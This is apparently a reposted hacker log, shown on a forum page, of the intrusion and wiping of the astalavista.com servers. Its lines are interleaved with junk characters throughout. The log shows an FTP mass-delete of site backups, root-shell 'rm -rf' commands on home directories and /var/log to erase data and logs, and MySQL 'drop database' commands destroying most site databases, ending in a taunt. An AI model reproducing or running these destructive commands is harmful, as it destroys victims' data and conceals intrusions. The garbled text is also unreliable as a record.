) z% A% W& Q. @/ ?% ?8 a, K2 d7 S1 g( O-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
( v) o3 g4 C& U; Z* U-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
$ i7 G0 ^ d/ [7 ?1 h, Z-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
2 \$ G; z) o8 `-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar$ g. |( o6 z0 H$ m4 h( B$ r9 |
[snip]
3 q' ?8 T) C$ b/ G- S- e! c226 Transfer complete.& M# R4 V4 f0 j, i% R/ C
ftp> mdelete *( k% L! O4 z/ F0 s! F" H# _8 p
ftp> ls -la8 |& O2 U. B2 D1 ^
227 Entering Passive Mode (212,254,194,163,2,193)
, T3 E6 ]/ ^+ J& _, Y0 ^9 G150 Opening BINARY mode data connection for ‘file list’.9 y! @/ ~# v5 p J
226 Transfer complete.# I5 {! B9 @) [' ?! @, T0 W/ a7 G
ftp>) i) ~/ A" c$ J! N6 e; M3 R
3 I, `) c' G, W$ t9 K" f Ysh-3.2# cd /home8 q+ Q' I/ K& G. C" x3 y/ p$ @. A
sh-3.2# ls -la- i6 |8 o* s8 j6 r A% d/ T3 Q, K
total 120
( j8 b+ g! O* g- Cdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
( ?! n3 f) R; \, y" U' l" Fdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..6 J% {6 g9 \% Y# E* z
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
! ?7 T7 _0 B0 x$ [( j, y; c% _; M-rw——- 1 root root 8192 Jun 4 03:03 aquota.group. N# F3 h+ [3 M0 R7 e& r; U0 d
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user' k" r9 _+ d: u% A+ x
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
/ R; Z/ Q0 v7 T7 ]7 S, Bdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup+ i4 f& `% \# R. L: }+ }/ d8 L+ C
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161& q0 X# N0 x7 j2 W8 u9 O& Q _# ]
drwx–x–x 10 com com 4096 Apr 28 12:40 com6 U9 Q8 f+ \5 W8 x
drwxr-xr-x 2 root root 4096 May 17 2007 ftp/ A7 ?1 s; o, v4 W+ `; P; M/ P4 X: ]
drwx—— 3 jon jon 4096 Sep 21 2007 jon. X5 z2 N! o2 i1 [6 k( o4 X) @
drwx—— 2 root root 16384 Sep 11 2007 lost+found
0 I! J; }1 r W$ ?7 T0 R5 i5 Vdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
& P! V$ q2 t7 Odrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
9 k! C* J! B* D# A5 k* odrwx—— 2 jon jon 4096 Sep 15 2007 test
! s: v: _. ~, I$ Z/ j8 O$ b6 ?drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp% A6 F2 y& i2 M6 S
. b; B2 N; g* J4 F0 tsh-3.2# rm -rf backup// K' s! H$ S. @, F, {0 @
sh-3.2# rm -rf backup.14161/$ e; q' @# Q/ H1 R8 D! P8 Q
sh-3.2# rm -rf ftp/
" m8 `1 e) O& `- L" R( B3 ash-3.2# rm -rf jon/% j- P. D! }9 S) o* x
sh-3.2# rm -rf my/) D' V: W; Z- H+ e4 W) r* i
sh-3.2# rm -rf mysqldata/& s% Y! |$ P4 `8 L
sh-3.2# rm -rf test/# y* k; V- l) n
sh-3.2# rm -rf tmp/$ x' a& P. r) N( |% i! D7 q
sh-3.2# cd ~. S# [2 d7 F- O0 @
sh-3.2# rm -rf *& q- Q3 J! s* ?0 I6 Y" U5 [* F
sh-3.2# rm -rf /var/log/
. Q9 T+ w. X4 V. {1 Mrm: cannot remove directory `/var/log//proftpd’: Directory not empty6 f8 h6 _1 Y9 w* c
sh-3.2# rm -rf /home/*
# K9 e: ~: R2 N' jsh-3.2# mysql
( D2 z6 k* `% d; C- M. IWelcome to the MySQL monitor. Commands end with ; or \g.9 Q! }5 w" G+ f: k, t8 e
Your MySQL connection id is 4071562 I5 ~* F# q5 n; ]5 n/ `
Server version: 5.0.45-community-log MySQL Community Edition (GPL)8 w6 p* e# B' b, J/ a4 h; Z0 l6 C
; m, p: A' J. d- h! m* }5 V
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.( z f7 k% ~* {
* H& k0 I8 m6 emysql> show databases;% c3 ~2 m \" W2 W
+———————–+8 C# n( y5 t1 Q! ?# x! T* E* v0 X( ]5 d
| Database |
3 Z0 N A# a3 l2 [" I6 d/ V( R+———————–+
7 a0 {8 c5 j, Q* ^. {3 V| information_schema |
. ]. x. W! d- k @- ]& l| astanet_ads |# q) Y) ?0 T/ j2 ~9 `. {
| astanet_mailing_lists |
: y7 j! N4 T, T| astanet_mediawiki |; v+ z) q3 W# r% O c
| astanet_membersystem |8 ]( w/ P# m: X6 n, [. n* j
| com_contrexx |
* a/ M' Q% @4 s: C| com_contrexx2 |3 _' R% N. k: N- K/ G
| com_contrexx2_live |+ s% f( I; V$ z
| da_roundcube |
: |2 C H7 F# F6 \% `! T| dolphin |# _. U# V, h2 A5 ^
| ideapool |$ ?& q% _7 @! c
| mysql |
/ E: n) @2 f6 u K; A+ p| test |
3 d V: V- [' n) F, ]* a| yourmaster |
' N/ b6 [. q% A* Z% {+———————–+
+ _1 Q5 p/ l* f. B14 rows in set (0.03 sec)$ G/ `! ]6 k6 }- G
4 O0 o o+ ?* ~+ _0 k0 E/ rmysql> drop database astanet_membersystem;. Q+ W2 a- Z k d# e o
droQuery OK, 46 rows affected (0.81 sec)
R7 ^% s. x( U4 s4 D F$ _8 G; L9 t# s0 o
mysql> drop database com_contrexx;
5 Y, s# r; l4 u$ Q9 m3 v2 fQuery OK, 211 rows affected (2.72 sec)# g" _2 Y/ p1 @1 d. O, B5 @2 Y3 ^
' I0 u6 @! N2 pmysql> drop database com_contrexx2;; f5 N" p8 r6 i0 |- x" H5 Z
Query OK, 237 rows affected (2.23 sec)+ {5 H0 z1 @* M5 w. B: D% r( k* E" I
1 s. O6 b/ J* A. L; w( u
mysql> drop database com_contrexx2_live;
5 d. S V. ?! R: d" UQuery OK, 227 rows affected (7.63 sec). O3 H, D! z2 g4 }
( _/ [+ S) F8 P% T3 c5 j0 T* c
mysql> drop database ideapool;
% m% n7 v" l4 `' E9 |6 T# }Query OK, 69 rows affected (0.19 sec)5 T0 k) A6 }" J. b) o
0 F# `7 X+ L& D) W
mysql> drop database yourmaster;6 \6 `+ m5 f; C$ B5 n, @5 V, m0 V
Query OK, 158 rows affected (0.55 sec), h4 {% X& s6 s# l. E
) |' O3 g. C$ j$ P0 U8 k( tmysql> drop database astanet_ads;
. e3 b1 l2 i% ?& kQuery OK, 9 rows affected (0.11 sec)! J, r; I8 A& M- p$ Q+ K) @2 j
& j2 B& T" g0 ^, c1 g3 n4 Q+ O# `
mysql> drop database astanet_mailing_lists;$ c7 r, B; s+ [8 N" n6 p; K0 O
Query OK, 24 rows affected (1.47 sec)* q h# x' E/ w% I/ p# D* A7 D
" J/ l/ a+ J7 t% c& I: {& Rmysql> drop database astanet_mediawiki;! X1 h6 K9 q& J
Query OK, 31 rows affected (0.51 sec)/ {% N* m! ?/ s0 p
. O. V# X* y$ Z# c8 Jmysql> show databases;
& u" s2 `7 B, Z# [+——————–+0 R3 O/ s% U! A. l/ k* o
| Database |7 t' J, s( C- h& d$ p7 B
+——————–+
6 e$ y0 N: R8 F: u& Z| information_schema |( Z4 E+ p, f% G. F8 \
| da_roundcube |
4 C+ Z( P9 R+ s0 L. K: t) |$ R2 m* l| dolphin |/ s5 V. ]/ N7 o/ h3 f- U& ]
| mysql |
( w2 P% t, }7 H4 V5 {| test |3 Z* P, G' ~, q+ V# f+ z+ o
+——————–+/ t' v( C. f% h5 l
5 rows in set (0.00 sec)- j! E3 A j( Y$ S
* b: Y4 r7 p7 |* p
What a journey! We’re not sure exactly why the “Terminator” had any influence on6 W+ s" O) s v" s$ v2 |9 c9 h: K
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
& T! j2 \* t7 gwrong to say this pack of morons *wont be back*.
# _2 _) |2 {# V$ V6 s0 t |
发表于 2012-11-6 21:07:34
收藏
支持
反对